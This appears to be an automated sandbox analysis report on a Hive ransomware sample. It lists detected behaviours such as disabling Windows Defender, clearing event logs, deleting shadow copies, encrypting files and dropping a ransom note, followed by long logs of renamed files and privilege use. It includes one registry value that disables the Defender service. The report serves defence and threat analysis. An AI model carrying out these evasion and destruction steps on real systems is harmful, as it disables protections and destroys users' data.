Malware Analysis Report

2024-10-16 03:11

Sample ID 220112-vctrxsdcd4
Target ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.7z
SHA256 3637aef5b536218308df14490502af0cd9fd71ae4e75788d23a0940c75328fe9
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3637aef5b536218308df14490502af0cd9fd71ae4e75788d23a0940c75328fe9

Threat Level: Known bad

The file ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.7z was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies security service

Hive

Deletes Windows Defender Definitions

Modifies Windows Defender Real-time Protection settings

Clears Windows event logs

Deletes shadow copies

Modifies boot configuration data using bcdedit

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Runs ping.exe

Modifies registry class

Runs net.exe

Opens file in notepad (likely ransom note)

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 16:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 16:51

Reported

2022-01-12 16:56

Platform

win7-en-20211208

Max time kernel

111s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\RepairEdit.tif => C:\Users\Admin\Pictures\RepairEdit.tif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_EhNcjUAuLdM0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Users\Admin\Pictures\RepairEdit.tif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_EhNcjUAuLdM0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_2K-A8LTlW3c0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\COMPASS\COMPASS.ELM.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_HxyKwaAO0kA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_8Q6E0oc6aSk0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_K_COL.HXK.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_3yv4CdwDjBk0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGACCBAR.XML.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_1d5LHCbnaoQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_5pwCAk2ZeU40.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_TDi2M248ae40.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_mB197x-7ESg0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_iqTGUFcF8K40.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02055_.GIF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_QrECq0XitvE0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_UaFo7RFhTW80.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\id.txt.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_7nt2z_fC8G80.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Beirut.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_OIDYItiR9UA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Media Player\en-US\WMPMediaSharing.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msdaremr.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FREN\WT61FR.LEX.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_-A5L_yyGy9w0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21320_.GIF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_73Xpwn8vOXU0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_sXWSuGNPlOw0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_o0gZWWqnMpE0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_ZAYgjyLklNI0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_2iBLvPrc1cs0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00525_.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_QmX4s34Pm_w0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Apex.eftx.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_J92562rVLaA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\LightSpirit.css.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_IvKtXVYpzBU0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME32.CSS.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX__Juo41fnAak0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR35B.GIF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_He5v3L7Le2Y0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_6mmSMYFtRpg0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_kRcKiFTFKdY0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_cxO5c_vZWKQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\ED00172_.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_KMKEoirQ7Kk0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_FCW9pEv76SY0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\DELIMDOS.FAE.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_yMZghGXwK0M0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\vintage.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\de-DE\Sidebar.exe.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_nzaHGLv0l7g0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\gadget.xml C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\css\settings.css C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\RSSFeeds.css C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152694.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_6y_JmgaBjcc0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_ohINEspscuA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENV98SP.POC.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_xVSL3MKDwio0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Australia\vyS2_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_T_5kpoyHQ4o0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Media Renderer\DMR_120.jpg C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107138.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_LXf1aZUo83k0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10298_.GIF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_IUEzNwTFoFo0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.POC.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_GXJ8f_850rQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RES98.POC.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_gZ_OULBOO1Q0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_sbwHUebQ9pc0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsColorChart.html.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_Ioa59tnyF6g0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_uwITgXmPWSI0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_Tng6RQylyO40.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106146.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_8jBlI_xLw680.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107342.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_wU-hOPd_Trc0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_pressed.gif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_Jv4qWcwwWMA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\wmplayer.exe.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Equity.eftx.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_dLxdhNykO340.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Internet Explorer\ie9props.propdesc C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
